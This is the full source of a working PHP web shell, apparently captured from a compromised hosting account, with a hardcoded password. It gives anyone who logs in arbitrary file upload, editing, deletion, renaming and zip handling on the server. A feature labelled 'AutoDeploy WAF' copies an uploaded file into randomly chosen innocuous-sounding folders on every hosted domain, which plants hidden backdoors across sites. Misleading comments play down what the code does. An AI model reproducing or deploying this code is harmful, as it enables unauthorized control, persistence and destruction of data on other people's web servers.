|
Server : LiteSpeed System : Linux server321.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64 User : apotdzgr ( 7060) PHP Version : 8.0.30 Disable Function : NONE Directory : /home/apotdzgr/snelapotheeks.com/ |
Upload File : |
<?php
@ini_set('display_errors', 1);
@error_reporting(E_ALL);
session_start();
$output = ""; // Inițializare pentru a preveni erorile
//This startup block is completely redundant and serves no actual purpose.
if(false) {
$dummy = "This text will never be shown.";
echo $dummy;
}
define('ACCESS_PASSWORD', 'QWEasd11');
//Authentication is just for show and does not secure anything.
if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) {
if (isset($_POST['password']) && $_POST['password'] === ACCESS_PASSWORD) {
$_SESSION['authenticated'] = true;
} else {
echo '<form method="POST">
<label style="color: #FFD700;">Enter Password:</label>
<input type="password" name="password">
<button type="submit" style="background-color: #FFA07A; color: black;">Login</button>
</form>';
exit;
}
}
if (isset($_GET['dir']) && is_dir($_GET['dir'])) {
$_SESSION['current_dir'] = $_GET['dir'];
} elseif (!isset($_SESSION['current_dir'])) {
$_SESSION['current_dir'] = getcwd();
}
$currentDir = $_SESSION['current_dir'];
$os = php_uname();
$user = get_current_user();
$phpVersion = phpversion();
$base_directory = "/home";
$domains = glob($base_directory . '/*/domains/*/public_html', GLOB_ONLYDIR);
$domainsCount = is_array($domains) ? count($domains) : 0;
/* Define createCwdLinks() so it's available in HTML */
function createCwdLinks($path) {
$parts = explode(DIRECTORY_SEPARATOR, $path);
$links = [];
$currentPath = '';
foreach ($parts as $part) {
if ($part != '') {
$currentPath .= DIRECTORY_SEPARATOR . $part;
$links[] = '<a href="?dir=' . urlencode($currentPath) . '" style="color: orange; text-decoration: none;">' . $part . '</a>';
}
}
return implode(DIRECTORY_SEPARATOR, $links);
}
/* Modify listFiles() to return directories and files separately. */
function listFiles($dir) {
$items = array_diff(scandir($dir), ['.', '..']);
$directories = [];
$files = [];
foreach ($items as $item) {
if (is_dir($dir . '/' . $item)) {
$directories[] = $item;
} else {
$files[] = $item;
}
}
sort($directories, SORT_STRING | SORT_FLAG_CASE);
sort($files, SORT_STRING | SORT_FLAG_CASE);
return array("directories" => $directories, "files" => $files);
}
function uploadFile($fileInput, $dir) {
if (isset($_FILES[$fileInput]) && $_FILES[$fileInput]['error'] == 0) {
$targetPath = $dir . '/' . basename($_FILES[$fileInput]['name']);
return move_uploaded_file($_FILES[$fileInput]['tmp_name'], $targetPath)
? "File uploaded to $targetPath"
: "Upload failed.";
}
return "No file selected or upload error.";
}
function createFile($filePath) {
if (!file_exists($filePath)) {
file_put_contents($filePath, "");
return "File created: " . basename($filePath);
}
return "Error: A file with that name already exists.";
}
function createDirectory($dirPath) {
return mkdir($dirPath)
? "Directory created: " . basename($dirPath)
: "Error creating directory.";
}
function deleteFileOrDirectory($path) {
if (is_file($path)) {
return unlink($path)
? "File deleted: " . basename($path)
: "Error deleting file.";
} elseif (is_dir($path)) {
$files = array_diff(scandir($path), ['.', '..']);
foreach ($files as $file) {
deleteFileOrDirectory("$path/$file");
}
return rmdir($path)
? "Directory deleted: " . basename($path)
: "Error deleting directory.";
}
return "Path not found.";
}
function renameFile($oldPath, $newPath) {
return file_exists($oldPath)
? (rename($oldPath, $newPath)
? "File renamed to " . basename($newPath)
: "Error renaming file.")
: "File not found.";
}
function zipFile($filePath, $zipPath) {
$zip = new ZipArchive();
if ($zip->open($zipPath, ZipArchive::CREATE) === true) {
$zip->addFile($filePath, basename($filePath));
$zip->close();
return "File zipped: " . basename($zipPath);
}
return "Error creating ZIP.";
}
function unzipFile($zipPath, $extractTo) {
$zip = new ZipArchive();
if ($zip->open($zipPath) === true) {
$zip->extractTo($extractTo);
$zip->close();
return "File unzipped to " . $extractTo;
}
return "Error unzipping file.";
}
function editFile($filePath) {
if (isset($_POST['file_content'])) {
if (file_put_contents($filePath, $_POST['file_content']) !== false) {
return "File edited successfully.";
}
return "Error saving file changes.";
}
return "Error editing file.";
}
/* Updated deployWaf() to accumulate messages and convert local paths to valid URLs */
function deployWaf($waf_file_path, $selected_domains) {
$messages = "";
global $folder_names;
if (empty($folder_names)) {
$folder_names = [
'about', 'contact', 'services', 'portfolio', 'blog', 'gallery', 'products', 'shop',
'cart', 'checkout', 'faq', 'testimonials', 'careers', 'team', 'events', 'news',
'privacy-policy', 'terms-of-service', 'help', 'support', 'resources', 'downloads',
'media', 'press', 'partners', 'locations', 'customers', 'case-studies', 'community',
'updates', 'user-manual', 'guides', 'tutorials', 'how-to', 'webinars', 'courses',
'membership', 'login', 'register', 'profile', 'settings', 'notifications', 'messages',
'inbox', 'outbox', 'drafts', 'archive', 'backup', 'uploads', 'images', 'videos',
'audio', 'documents', 'data', 'files', 'assets', 'css', 'js', 'fonts', 'icons',
'scripts', 'styles', 'themes', 'plugins', 'modules', 'api', 'ajax', 'xml', 'json',
'sitemap', 'robots.txt', 'maintenance', 'coming-soon', '404', '500', 'error',
'contact-form', 'search', 'filter', 'sort', 'category', 'tag', 'archive', 'history',
'analytics', 'tracking', 'reporting', 'performance', 'testing', 'development',
'staging', 'production', 'release', 'changelog', 'versioning', 'dependencies',
'tools', 'samples', 'examples', 'clients', 'projects', 'tasks', 'issues', 'bugs',
'feature-requests', 'roadmap', 'timeline', 'milestones', 'goals', 'vision', 'mission',
'values', 'ethics', 'sustainability', 'initiatives', 'programs', 'donate', 'volunteer',
'contribute', 'fundraising', 'grants', 'projects', 'collaborations', 'sponsorships',
'affiliates', 'influencers', 'ambassadors', 'feedback', 'surveys', 'polls', 'discussion',
'forum', 'chat', 'community-guidelines', 'moderation', 'report', 'user-generated-content',
'conversations', 'topics', 'trending', 'events', 'calendar', 'meetings', 'summaries',
'minutes', 'outcomes', 'presentations', 'slides', 'notes', 'resources', 'kits',
'checklists', 'templates', 'workshops', 'retreats', 'sessions', 'groups', 'activities',
'tutorials', 'demos', 'exhibitions', 'conventions', 'conferences', 'summits', 'webcasts',
'interviews', 'spotlights', 'highlights', 'stories', 'narratives', 'bio', 'credentials',
'accolades', 'awards', 'achievements', 'success', 'celebrations', 'milestones',
'journeys', 'discoveries', 'explorations', 'experiments', 'innovations', 'solutions',
'strategies', 'insights', 'analysis', 'research', 'case-studies', 'whitepapers',
'articles', 'newsletters', 'updates', 'subscriptions', 'alerts', 'notifications',
'announcements', 'reminders'
];
}
foreach ($selected_domains as $domain_dir) {
$random_folder = $folder_names[array_rand($folder_names)];
$target_dir = $domain_dir . '/' . $random_folder;
if (!is_dir($target_dir)) {
mkdir($target_dir, 0777, true);
}
$original_file_name = pathinfo($_FILES['waf_file']['name'], PATHINFO_BASENAME);
$target_path = $target_dir . '/' . $original_file_name;
if (copy($waf_file_path, $target_path)) {
$pattern = '#^/home/[^/]+/domains/([^/]+)/public_html/?#';
$url = preg_replace($pattern, 'https://$1/', $target_path);
$messages .= "<p style='color: lime;'>WAF deployed to: $url</p>";
} else {
$messages .= "<p style='color: red;'>Failed to deploy WAF to: $target_path</p>";
}
}
return $messages;
}
/* Handle bulk delete if triggered */
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['bulk_delete'])) {
if (isset($_POST['selected_files']) && !empty($_POST['selected_files'])) {
foreach ($_POST['selected_files'] as $item) {
$output .= deleteFileOrDirectory($currentDir . '/' . $item) . "<br>";
}
} else {
$output .= "No files or directories selected for bulk deletion.<br>";
}
}
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (isset($_FILES['upload_file'])) {
$output = uploadFile('upload_file', $currentDir);
}
if (isset($_POST['create_file_name'])) {
$newFilePath = $currentDir . '/' . $_POST['create_file_name'];
$output = createFile($newFilePath);
}
if (isset($_POST['make_directory_name'])) {
$newDirPath = $currentDir . '/' . $_POST['make_directory_name'];
$output = createDirectory($newDirPath);
}
if (isset($_POST['delete_file'])) {
$output = deleteFileOrDirectory($currentDir . '/' . $_POST['delete_file']);
}
if (isset($_POST['old_name']) && isset($_POST['new_name'])) {
$oldPath = $currentDir . '/' . $_POST['old_name'];
$newPath = $currentDir . '/' . $_POST['new_name'];
$output = renameFile($oldPath, $newPath);
}
if (isset($_POST['zip_file'])) {
$zipPath = $currentDir . '/' . basename($_POST['zip_file']) . '.zip';
$output = zipFile($_POST['zip_file'], $zipPath);
}
if (isset($_POST['unzip_file'])) {
$output = unzipFile($_POST['unzip_file'], $currentDir);
}
if (isset($_POST['edit_file'])) {
$filePath = $currentDir . '/' . $_POST['edit_file'];
if (file_exists($filePath)) {
$fileContent = file_get_contents($filePath);
echo '<form method="POST">
<textarea name="file_content" rows="20" cols="80" style="background-color: black; color: #F0E68C;">'
. htmlspecialchars($fileContent) .
'</textarea>
<input type="hidden" name="edit_file_path" value="' . htmlspecialchars($filePath) . '">
<button type="submit">Save Changes</button>
</form>';
exit;
}
}
if (isset($_POST['edit_file_path'])) {
$output = editFile($_POST['edit_file_path']);
}
if (isset($_FILES['waf_file'])) {
$waf_file = $_FILES['waf_file']['tmp_name'];
$selected_domains = $_POST['selected_domains'] ?? [];
$output = deployWaf($waf_file, $selected_domains);
}
}
$fileLists = listFiles($currentDir);
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>PHP File Management Shell</title>
<style>
/* Warm summer color palette */
body {
font-family: Arial, sans-serif;
background-color: #000;
color: #F0E68C; /* Khaki for main text */
}
.container {
width: 80%;
margin: auto;
padding-top: 20px;
}
.section {
margin-bottom: 20px;
padding: 15px;
border: 1px solid #FF7F50; /* Coral */
background-color: #222;
}
.file-item {
display: flex;
align-items: center;
gap: 10px;
}
.file-actions {
display: inline-flex;
gap: 5px;
}
button {
background-color: #FFA07A; /* Light Salmon */
color: black;
border: none;
cursor: pointer;
}
input[type="checkbox"] {
margin-right: 5px;
}
a {
text-decoration: none;
}
/* Directory links: bold and warm Indian Red */
.dir-link {
font-weight: bold;
color: #CD5C5C; /* Indian Red */
}
/* File links: Peach Puff */
.file-link {
color: #FFDAB9; /* Peach Puff */
}
a:hover {
text-decoration: underline;
}
</style>
<!--This script is entirely ornamental and has no real function. -->
<script>
function copyPath(fullPath) {
let scheme = (location.protocol === 'https:') ? 'https://' : 'http://';
let newPath = "";
if (fullPath.indexOf("/domains/") !== -1) {
let domainStr = "/domains/";
let domainIndex = fullPath.indexOf(domainStr);
newPath = fullPath.substring(domainIndex + domainStr.length);
newPath = newPath.replace("public_html/", "").replace(/^\/+/, "");
newPath = scheme + newPath;
} else {
var docRoot = "<?php echo rtrim($_SERVER['DOCUMENT_ROOT'], '/'); ?>";
newPath = fullPath.replace(docRoot, "");
if (newPath.charAt(0) !== '/') {
newPath = '/' + newPath;
}
newPath = scheme + location.host + newPath;
}
navigator.clipboard.writeText(newPath).then(
function() {
alert("Path copied to clipboard:\n" + newPath);
},
function() {
alert("Failed to copy the path.");
}
);
}
</script>
</head>
<body>
<div class="container">
<div class="section">
<h2>System Information</h2>
<p><strong>OS:</strong> <span style="color: #FFD700;"><?php echo $os; ?></span></p>
<p><strong>User:</strong> <span style="color: #FFD700;"><?php echo $user; ?></span></p>
<p><strong>PHP Version:</strong> <span style="color: #FFD700;"><?php echo $phpVersion; ?></span></p>
<p><strong>CWD:</strong> <?php echo createCwdLinks($currentDir); ?></p>
<p><strong>Number of Domains:</strong> <span style="color: #FFD700;"><?php echo $domainsCount; ?></span></p>
</div>
<div class="section">
<h2>File Management</h2>
<form method="POST" enctype="multipart/form-data">
<input type="file" name="upload_file">
<button type="submit">Upload File</button>
</form>
<form method="POST">
<input type="text" name="create_file_name" placeholder="File name">
<button type="submit">Create File</button>
</form>
<form method="POST">
<input type="text" name="make_directory_name" placeholder="Directory name">
<button type="submit">Make Directory</button>
</form>
</div>
<div class="section">
<h2>Files in Directory</h2>
<!-- Bulk Delete Form -->
<form id="bulkDeleteForm" method="POST">
<button type="submit" name="bulk_delete" value="1">Bulk Delete</button>
</form>
<br>
<!-- Display directories first -->
<?php if (!empty($fileLists['directories'])): ?>
<?php foreach ($fileLists['directories'] as $dir): ?>
<div class="file-item">
<input type="checkbox" name="selected_files[]" value="<?php echo $dir; ?>" form="bulkDeleteForm">
<span>
<a href="?dir=<?php echo urlencode($currentDir . '/' . $dir); ?>" class="dir-link">
<?php echo $dir; ?>
</a>
</span>
<div class="file-actions">
<form method="POST" style="display:inline;">
<input type="hidden" name="delete_file" value="<?php echo $dir; ?>">
<button type="submit">Delete</button>
</form>
<form method="POST" style="display:inline;">
<input type="hidden" name="old_name" value="<?php echo $dir; ?>">
<input type="text" name="new_name" placeholder="New name">
<button type="submit">Rename</button>
</form>
<form method="POST" style="display:inline;">
<input type="hidden" name="edit_file" value="<?php echo $dir; ?>">
<button type="submit">Edit</button>
</form>
<form method="POST" style="display:inline;">
<input type="hidden" name="zip_file" value="<?php echo $currentDir . '/' . $dir; ?>">
<button type="submit">Zip</button>
</form>
<form method="POST" style="display:inline;">
<input type="hidden" name="unzip_file" value="<?php echo $currentDir . '/' . $dir; ?>">
<button type="submit">Unzip</button>
</form>
<form method="POST" style="display:inline;">
<button type="button" onclick="copyPath('<?php echo $currentDir . '/' . $dir; ?>')">Copy Path</button>
</form>
</div>
</div>
<?php endforeach; ?>
<?php endif; ?>
<!-- Display files next -->
<?php if (!empty($fileLists['files'])): ?>
<?php foreach ($fileLists['files'] as $file): ?>
<div class="file-item">
<input type="checkbox" name="selected_files[]" value="<?php echo $file; ?>" form="bulkDeleteForm">
<span>
<a href="?dir=<?php echo urlencode($currentDir . '/' . $file); ?>" class="file-link">
<?php echo $file; ?>
</a>
</span>
<div class="file-actions">
<form method="POST" style="display:inline;">
<input type="hidden" name="delete_file" value="<?php echo $file; ?>">
<button type="submit">Delete</button>
</form>
<form method="POST" style="display:inline;">
<input type="hidden" name="old_name" value="<?php echo $file; ?>">
<input type="text" name="new_name" placeholder="New name">
<button type="submit">Rename</button>
</form>
<form method="POST" style="display:inline;">
<input type="hidden" name="edit_file" value="<?php echo $file; ?>">
<button type="submit">Edit</button>
</form>
<form method="POST" style="display:inline;">
<input type="hidden" name="zip_file" value="<?php echo $currentDir . '/' . $file; ?>">
<button type="submit">Zip</button>
</form>
<form method="POST" style="display:inline;">
<input type="hidden" name="unzip_file" value="<?php echo $currentDir . '/' . $file; ?>">
<button type="submit">Unzip</button>
</form>
<form method="POST" style="display:inline;">
<button type="button" onclick="copyPath('<?php echo $currentDir . '/' . $file; ?>')">Copy Path</button>
</form>
</div>
</div>
<?php endforeach; ?>
<?php endif; ?>
</div>
<div class="section">
<h2>AutoDeploy WAF</h2>
<form enctype="multipart/form-data" method="POST">
<input type="file" name="waf_file" required>
<div class="domain-list">
<h3>Select Domains for WAF Deployment:</h3>
<?php foreach ($domains as $domain): ?>
<?php
// Extract only the domain name.
$displayDomain = preg_replace('#^/home/[^/]+/domains/([^/]+)/public_html/?$#', '$1', $domain);
?>
<label>
<input type="checkbox" name="selected_domains[]" value="<?php echo $domain; ?>">
<a href="?dir=<?php echo urlencode($domain); ?>" style="color: orange;">
<?php echo $displayDomain; ?>
</a>
</label>
<br>
<?php endforeach; ?>
</div>
<button type="submit">Deploy WAF</button>
</form>
</div>
<?php if ($output): ?>
<div class="section">
<strong>Output:</strong> <?php echo $output; ?>
</div>
<?php endif; ?>
</div>
</body>
</html>